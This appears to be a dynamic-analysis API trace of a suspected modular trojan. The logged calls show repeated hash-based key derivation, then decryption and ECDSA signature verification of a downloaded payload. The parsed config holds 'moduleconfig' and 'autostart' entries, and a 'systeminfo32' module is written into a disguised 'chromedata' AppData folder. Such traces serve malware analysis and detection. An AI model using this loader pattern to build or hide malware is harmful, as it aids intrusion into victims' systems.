	[0153.540] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306190, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306190, pdwDataLen=0x128aac) returned 1
	[0153.540] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.540] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.540] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.540] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.540] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0153.540] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.540] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23061b8
	[0153.540] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23061b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23061b8, pdwDataLen=0x128aac) returned 1
	[0153.540] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.540] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.540] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.541] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.541] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0153.541] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23061e0
	[0153.541] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23061e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23061e0, pdwDataLen=0x128aac) returned 1
	[0153.541] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.541] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.541] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.541] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.541] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0153.541] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306208
	[0153.542] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306208, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306208, pdwDataLen=0x128aac) returned 1
	[0153.542] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.542] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.542] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.542] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.542] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0153.542] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306230
	[0153.542] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306230, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306230, pdwDataLen=0x128aac) returned 1
	[0153.542] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.542] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.542] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.543] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.543] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0153.543] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.543] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306258
	[0153.543] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306258, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306258, pdwDataLen=0x128aac) returned 1
	[0153.543] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.543] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.543] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.543] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.543] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0153.543] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.543] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306280
	[0153.543] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306280, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306280, pdwDataLen=0x128aac) returned 1
	[0153.543] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.543] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.543] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.544] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.544] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0153.544] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.544] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23062a8
	[0153.544] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23062a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23062a8, pdwDataLen=0x128aac) returned 1
	[0153.544] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.544] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.544] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.544] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.544] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0153.544] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.544] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23062d0
	[0153.544] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23062d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23062d0, pdwDataLen=0x128aac) returned 1
	[0153.544] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.544] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.544] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.545] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.545] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0153.545] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23062f8
	[0153.545] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23062f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23062f8, pdwDataLen=0x128aac) returned 1
	[0153.545] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.545] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.545] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.545] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.545] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0153.545] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306320
	[0153.545] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306320, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306320, pdwDataLen=0x128aac) returned 1
	[0153.545] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.545] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.545] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.546] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.546] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0153.546] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.546] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306348
	[0153.546] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306348, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306348, pdwDataLen=0x128aac) returned 1
	[0153.546] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.546] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.546] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.546] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.546] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0153.547] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306370
	[0153.547] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306370, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306370, pdwDataLen=0x128aac) returned 1
	[0153.547] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.547] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.547] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.547] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.547] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0153.547] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306398
	[0153.547] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306398, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306398, pdwDataLen=0x128aac) returned 1
	[0153.547] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.547] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.547] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.548] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.548] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0153.548] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23063c0
	[0153.548] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23063c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23063c0, pdwDataLen=0x128aac) returned 1
	[0153.548] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.548] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.548] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.548] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.548] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0153.548] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.548] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23063e8
	[0153.548] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23063e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23063e8, pdwDataLen=0x128aac) returned 1
	[0153.548] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.548] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.548] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.549] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.549] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0153.549] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.549] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306410
	[0153.549] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306410, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306410, pdwDataLen=0x128aac) returned 1
	[0153.549] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.549] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.549] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.549] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.549] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0153.549] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.549] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306438
	[0153.549] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306438, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306438, pdwDataLen=0x128aac) returned 1
	[0153.549] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.549] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.549] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.550] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.550] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0153.550] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306460
	[0153.550] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306460, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306460, pdwDataLen=0x128aac) returned 1
	[0153.550] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.550] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.550] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2730580) returned 1
	[0153.550] CryptAcquireContextW (in: phProv=0x128ad8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ad8*=0x225390) returned 1
	[0153.550] CryptImportKey (in: hProv=0x225390, pbData=0x128aa0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128ae0 | out: phKey=0x128ae0*=0x22b68c0) returned 1
	[0153.551] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x4, pbData=0x128acc*=0x1, dwFlags=0x0) returned 1
	[0153.551] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x1, pbData=0x2306460, dwFlags=0x0) returned 1
	[0153.551] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4080) returned 0x26c8c38
	[0153.551] CryptDecrypt (in: hKey=0x22b68c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26c8c38, pdwDataLen=0x128ad4 | out: pbData=0x26c8c38, pdwDataLen=0x128ad4) returned 1
	[0153.551] CryptDestroyKey (hKey=0x22b68c0) returned 1
	[0153.551] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.551] GetVersion () returned 0x1db10106
	[0153.551] CryptAcquireContextW (in: phProv=0x1289e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1289e0*=0x225390) returned 1
	[0153.551] CryptCreateHash (in: hProv=0x225390, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x1289e4 | out: phHash=0x1289e4) returned 1
	[0153.551] CryptHashData (hHash=0x22b6840, pbData=0x26c8c38, dwDataLen=0x4008, dwFlags=0x0) returned 1
	[0153.552] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x1289dc, pdwDataLen=0x1289d8, dwFlags=0x0 | out: pbData=0x1289dc, pdwDataLen=0x1289d8) returned 1
	[0153.552] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ab8
	[0153.552] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a5ab8, pdwDataLen=0x1289dc, dwFlags=0x0 | out: pbData=0x22a5ab8, pdwDataLen=0x1289dc) returned 1
	[0153.552] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.552] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.552] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128ae0, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128ae0) returned 0x0
	[0153.552] BCryptImportKeyPair (in: hAlgorithm=0x22ee168, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128ae8, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128ae8) returned 0x0
	[0153.555] BCryptGetProperty (in: hObject=0x22ad920, pszProperty="SignatureLength", pbOutput=0x128b00, cbOutput=0x4, pcbResult=0x128ad8, dwFlags=0x0 | out: pbOutput=0x128b00, pcbResult=0x128ad8) returned 0x0
	[0153.555] BCryptVerifySignature (hKey=0x22ad920, pPaddingInfo=0x0, pbHash=0x22a5ab8, cbHash=0x30, pbSignature=0x26ccc40, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0153.557] BCryptDestroyKey (in: hKey=0x22ad920 | out: hKey=0x22ad920) returned 0x0
	[0153.557] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee168, dwFlags=0x0 | out: hAlgorithm=0x22ee168) returned 0x0
	[0153.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ab8) returned 1
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4000) returned 0x26cccc0
	[0153.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2305028) returned 1
	[0153.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2306460) returned 1
	[0153.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26c8c38) returned 1
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306460
	[0153.557] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff180
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x21a158
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2730580
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff078
	[0153.557] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0153.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff078) returned 1
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff078
	[0153.557] CharLowerBuffA (in: lpsz="autostart", cchLength=0x9 | out: lpsz="autostart") returned 0x9
	[0153.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff078) returned 1
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff078
	[0153.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff090
	[0153.557] CharLowerBuffA (in: lpsz="limit", cchLength=0x5 | out: lpsz="limit") returned 0x5
	[0153.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff090) returned 1
	[0153.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff090
	[0153.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x279a30
	[0153.558] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x279a30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0153.558] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160
	[0153.559] WriteFile (in: hFile=0x160, lpBuffer=0x272c4c8*, nNumberOfBytesToWrite=0x40b0, lpNumberOfBytesWritten=0x128b40, lpOverlapped=0x0 | out: lpBuffer=0x272c4c8*, lpNumberOfBytesWritten=0x128b40*=0x40b0, lpOverlapped=0x0) returned 1
	[0153.560] CloseHandle (hObject=0x160) returned 1
	[0153.562] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x272c4c8) returned 1
	[0153.562] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x279a30) returned 1
	[0153.562] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a9e60) returned 1
	[0153.562] WinHttpCloseHandle (hInternet=0x22ca8e0) returned 1
	[0153.562] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0153.562] WinHttpCloseHandle (hInternet=0x22c4dc0) returned 1
	[0153.563] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a8d68) returned 1
	[0153.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x209fc0
	[0153.563] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
